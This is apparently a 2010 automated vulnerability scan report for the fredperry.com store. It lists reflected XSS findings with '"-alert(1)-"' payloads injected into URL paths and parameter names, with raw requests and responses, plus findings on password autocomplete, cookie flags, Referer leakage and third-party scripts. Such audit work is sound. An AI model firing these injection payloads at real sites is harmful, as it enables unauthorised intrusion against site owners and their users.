<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/woven-shirtse3987"-alert(1)-"e15c6a40149/"); //]]> ...[SNIP]...
1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/woven-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd97"-alert(1)-"328bf5904c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c3dc"-alert(1)-"76794ee1910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer8c3dc"-alert(1)-"76794ee1910/account/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:28:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=lig1hamq19vigkptie5smff0h3; expires=Tue, 09-Nov-2010 17:28:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customer8c3dc"-alert(1)-"76794ee1910/account/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58371"-alert(1)-"854ac7c6992 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer/account58371"-alert(1)-"854ac7c6992/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:28:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=btgkebc10t2gjuigr3f5i4g5a6; expires=Tue, 09-Nov-2010 17:28:40 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customer/account58371"-alert(1)-"854ac7c6992/"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84ec"-alert(1)-"731c73bbde8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customerb84ec"-alert(1)-"731c73bbde8/account/login/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:28:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=i750lfosl1s47pnanmg5inj6p2; expires=Tue, 09-Nov-2010 17:28:12 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customerb84ec"-alert(1)-"731c73bbde8/account/login/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c53"-alert(1)-"5e56b29bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer/account61c53"-alert(1)-"5e56b29bc4/login/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:28:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=j89bi60c7faef84lhq7uka42e5; expires=Tue, 09-Nov-2010 17:28:50 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customer/account61c53"-alert(1)-"5e56b29bc4/login/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e47f"-alert(1)-"623ae57ed21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer/account/login1e47f"-alert(1)-"623ae57ed21/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:29:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=t09b9es2tf5c0lopedavb2inm0; expires=Tue, 09-Nov-2010 17:29:29 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customer/account/login1e47f"-alert(1)-"623ae57ed21/"); //]]> ...[SNIP]...
1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.fredperry.com
Path:
/customer/account/login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc2d"-alert(1)-"f9ade8fa6f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c01"-alert(1)-"bf363aed77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1 HTTP/1.1 Host: www.fredperry.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 18:41:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=3pfqrlqdvcu228fqdlisdgne45; expires=Tue, 09-Nov-2010 19:41:20 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Keep-Alive: timeout=3, max=500 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 29410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d4e"-alert(1)-"4939634274c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sales36d4e"-alert(1)-"4939634274c/order/history/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:28:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=utkl6i851mv1292i1u4cilrvo3; expires=Tue, 09-Nov-2010 17:28:26 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/sales36d4e"-alert(1)-"4939634274c/order/history/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc3d"-alert(1)-"9878bb43d9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sales/order5fc3d"-alert(1)-"9878bb43d9f/history/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:29:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=loigkgvlq3rk860abto84uanr5; expires=Tue, 09-Nov-2010 17:29:06 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/sales/order5fc3d"-alert(1)-"9878bb43d9f/history/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f660f"-alert(1)-"21f8a2e8aaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:29:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=3kg62colr7hf79g2ki8eq19c01; expires=Tue, 09-Nov-2010 17:29:57 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/"); //]]> ...[SNIP]...
2. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.fredperry.com
Path:
/customer/account/login/
Issue detail
The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:
login[password]
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /customer/account/login/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer/account/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer/account/login/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1 Host: www.fredperry.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 18:36:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Keep-Alive: timeout=3, max=500 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 29379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sales/order/history/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ= HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/home/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /checkout/cart/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
